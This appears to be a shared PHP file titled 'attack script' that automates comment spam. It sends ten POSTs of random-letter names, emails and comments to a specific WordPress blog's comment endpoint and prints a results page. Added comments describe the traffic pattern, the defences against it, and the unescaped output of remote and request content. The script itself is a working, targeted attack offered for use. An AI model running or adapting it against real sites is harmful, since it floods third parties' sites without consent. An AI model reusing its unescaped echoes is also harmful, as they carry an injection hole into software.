Created
May 1, 2014 21:54
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>attack script</title> | |
</head> | |
<body> | |
<?php | |
/* ------------ Functions needed for attack --------------------- */ | |
/**
 * Build a string made only of random ASCII letters.
 *
 * For every character a rand(0,1) coin flip chooses the case, then a second
 * rand() call picks a code point inside A-Z or a-z. The output therefore
 * never contains digits, spaces or punctuation, which is why text produced
 * by this helper stands out from human-written names and comments.
 * rand() is not a cryptographically secure generator.
 *
 * @param int $len Number of letters wanted; zero or a negative value gives "".
 * @return string A string of $len letters.
 */
function rand_str($len)
{
    $letters = "";
    for ($remaining = $len; $remaining > 0; $remaining--) {
        if (rand(0, 1)) {
            $code = rand(ord("A"), ord("Z"));
        } else {
            $code = rand(ord("a"), ord("z"));
        }
        $letters .= chr($code);
    }
    return $letters;
}
/* ----------------- Misc. preprocessing -------------------- */ | |
/*
 * Reviewer summary (defensive reading of this listing):
 *   - Every request is a POST to one fixed comment endpoint, sent over a
 *     single reused cURL handle, one request per second, ten in total.
 *   - author, email and comment are letters only (see rand_str); the email
 *     is always <letters>@<letters>.com.
 *   - Traffic of this shape is what per-source rate limiting on the comment
 *     endpoint, a moderation queue or anti-spam filter, and a CAPTCHA or
 *     form token on the comment form are meant to stop.
 */

/* Report timestamps are rendered in US Pacific time. */
date_default_timezone_set('America/Los_Angeles');

/* Target URLs are hard-coded; only $funct_url is ever requested. */
$page_url = "http://feucht.us/blog";
$funct_url = "http://feucht.us/blog/wp-comments-post.php";

/* One handle, configured once with the endpoint and reused in the loop. */
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $funct_url);

/* Report header. $page_url is written into the HTML without escaping. */
$run_stamp = date("d-m-Y h:i:s");
echo "<h1>Comment spam run on <i>" . $page_url . "</i> on " . $run_stamp . "</h1>";
echo "<h3><b>RESULTS:</b></h3>";

$num_coms = 10;    /* number of requests in this run */
$wait_period = 1;  /* fixed delay in seconds before each request */

/* Inclusive min/max lengths for each randomly generated field. */
list($name_min, $name_max) = array(5, 20);       /* author name */
list($alias_min, $alias_max) = array(8, 15);     /* email local part */
list($domain_min, $domain_max) = array(3, 10);   /* email domain label */
list($comment_min, $comment_max) = array(5, 40); /* comment body */

for ($sent = 0; $sent < $num_coms; $sent++) {
    /* Constant spacing between requests: a regular cadence visible in access logs. */
    sleep($wait_period);

    /* Field values are drawn in this order: name, email local part, email domain, comment. */
    $rname = rand_str(rand($name_min, $name_max));
    $alias = rand_str(rand($alias_min, $alias_max));
    $domain = rand_str(rand($domain_min, $domain_max));
    $remail = $alias . "@" . $domain . ".com";
    $rcomment = rand_str(rand($comment_min, $comment_max));

    /* The body is assembled by plain concatenation and handed to cURL as a string. */
    $post_string = "author=" . $rname . "&email=" . $remail . "&comment=" . $rcomment;
    curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);

    /*
     * CURLOPT_RETURNTRANSFER is never set, so curl_exec() writes the remote
     * response body straight into this page and returns only a boolean for
     * the transfer itself. Anyone opening this page renders HTML from the
     * remote host inside the local origin.
     */
    $transfer_ok = curl_exec($curl);
    if ($transfer_ok) {
        echo "<hr><p><span style='color:green'>Successfully submitted</span>";
    } else {
        echo "<hr><p><span style='color:red'>Did not successfully submit</span>";
    }

    /* The request body and endpoint are echoed into the report unescaped. */
    echo " POST request <b>" . $post_string . "</b></p><p>to</p><p><b>" . $funct_url . "</b></p>";
}
?> | |
</body> | |
</html> |